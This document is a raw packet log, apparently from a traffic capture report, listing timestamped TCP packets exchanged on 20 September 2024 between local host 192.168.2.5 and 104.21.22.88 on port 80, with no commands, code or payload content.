                                                              Sep 20, 2024 12:00:06.811475992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811494112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811502934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811512947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811528921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811543941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811543941 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811558962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811568975 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811574936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811592102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811599970 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811609030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811625004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811635017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811640978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811656952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811662912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.811672926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.811698914 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.812028885 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812045097 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812088013 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.812185049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812232018 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.812781096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812935114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812949896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.812980890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.813102007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.813148022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.813600063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.813616037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.813632965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.813648939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.813664913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.813733101 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900413036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900449038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900465965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900480986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900506020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900521040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900544882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900559902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900574923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900576115 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900590897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900616884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900630951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900645971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900660992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900676012 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900676012 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900691032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900707960 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900719881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900732040 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900742054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900764942 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900782108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900785923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900803089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900818110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900824070 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900835037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900856972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900860071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900876999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900892019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900898933 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900907040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900922060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900935888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900945902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900962114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900963068 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.900979042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.900995016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901000023 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901010990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901036024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901036978 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901052952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901067972 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901074886 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901082993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901103973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901113033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901129961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901144028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901154041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901159048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901175976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901180983 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901191950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901207924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901211023 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901233912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901248932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901248932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901266098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901281118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901288986 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901305914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901320934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901326895 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901336908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901360035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901361942 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901386023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901401043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901415110 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901453972 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901465893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901469946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901485920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901500940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901515961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901520967 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901532888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901547909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901570082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901585102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901586056 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901599884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901616096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901621103 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901632071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901647091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901657104 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901671886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901679993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901688099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901702881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901719093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901726961 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901736021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901751041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901753902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901771069 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901786089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901792049 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901801109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901817083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.901818037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.901854992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904007912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904052973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904067993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904083967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904093981 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904109001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904120922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904125929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904154062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904165983 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904170990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904187918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904201984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904210091 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904230118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904237032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904246092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904272079 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904280901 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904289007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904305935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904320955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904325008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904345989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904357910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904361963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904381990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904397964 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904429913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904445887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904462099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904468060 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904478073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904491901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904498100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904509068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904525995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904527903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904573917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904598951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904623985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904645920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904658079 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904661894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904687881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904701948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904704094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904717922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904732943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904733896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904751062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904772043 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904773951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904791117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904804945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904808044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904822111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904835939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904843092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904854059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904869080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904872894 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.904886007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.904907942 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.935537100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991188049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991220951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991236925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991251945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991266966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991281033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991297960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991322041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991337061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991352081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991375923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991390944 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991408110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991416931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991436005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991451979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991458893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991467953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991483927 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991492987 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991507053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991523981 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991523981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991542101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991555929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991565943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991571903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991597891 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991630077 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991647005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991660118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991672039 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991676092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991692066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991703033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991708040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991734028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991741896 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991751909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991767883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991776943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991784096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991799116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991808891 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991815090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991831064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991842031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991848946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991873026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991883039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991899014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991913080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991929054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991936922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991944075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991955996 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991970062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.991978884 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.991986990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992003918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992022991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992027044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992039919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992059946 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992064953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992080927 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992095947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992103100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992111921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992134094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992137909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992153883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992168903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992175102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992196083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992202997 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992211103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992227077 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992240906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992253065 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992257118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992276907 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992280006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992300034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992315054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992316961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992331982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992347002 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992357016 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992362976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992379904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992386103 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992405891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992415905 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992423058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992438078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992453098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992458105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992468119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992485046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992491007 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.992501020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.992520094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994719982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994741917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994766951 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994769096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994786978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994801998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994806051 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994818926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994837046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994843960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994859934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994874954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994880915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994893074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994910955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994910955 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.994936943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.994946957 CEST4972480192.168.2.5104.21.22.88
